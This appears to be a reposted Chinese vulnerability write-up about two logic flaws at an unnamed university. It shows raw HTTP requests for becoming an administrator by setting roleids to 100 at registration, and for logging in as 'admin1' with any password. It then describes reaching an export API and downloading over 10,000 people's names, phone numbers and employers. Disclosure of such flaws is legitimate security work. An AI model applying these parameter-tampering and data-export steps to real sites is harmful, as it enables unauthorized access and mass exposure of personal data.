漏洞一
1、漏洞描述
某大学存在逻辑缺陷可注册为管理员
2、功能点和数据包
数据包如下
|
POST /page/register HTTP/1.1Host:Cookie:Content-Length: 402Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"Accept: application/json, text/javascript, /; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0Sec-Ch-Ua-Platform: "Windows"Origin: Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close |
3、复现过程
将roleids改为100即可完成注册
4、成功证明
漏洞二
1、漏洞描述
某大学存在逻辑缺陷可获取用户信息
2、复现过程
点击学员登录,使用bp抓包
正常来说都是尝试admin账户,但是密码错误。数据包如下
|
POST /api/Login HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 60 Connection: close Cookie: ASP.NET_SessionId=l2udrlro1gkjnhrkvw3rpw5n {"logname":"admin","password":"1","unifyaccountlogin":true} |
将用户名改为admin1后有奇效,密码输什么都是对的
|
POST /api/Login HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 60 Connection: close Cookie: ASP.NET_SessionId=l2udrlro1gkjnhrkvw3rpw5n {"logname":"admin1","password":"1","unifyaccountlogin":true} |
然后就得到一个可登录的用户,进入到了后台
翻js找到一个后台路径../html/indexback.html ,带着session访问进入后台,但是后台没有东西
在后台再翻js找到路径../api/ExportUserList/用户信息 ,带着session访问,能够下载文件,打开文件,里面有1w多个姓名和电话号码以及工作单位。
原文始发于微信公众号(隐雾安全):某大学存在逻辑缺陷漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论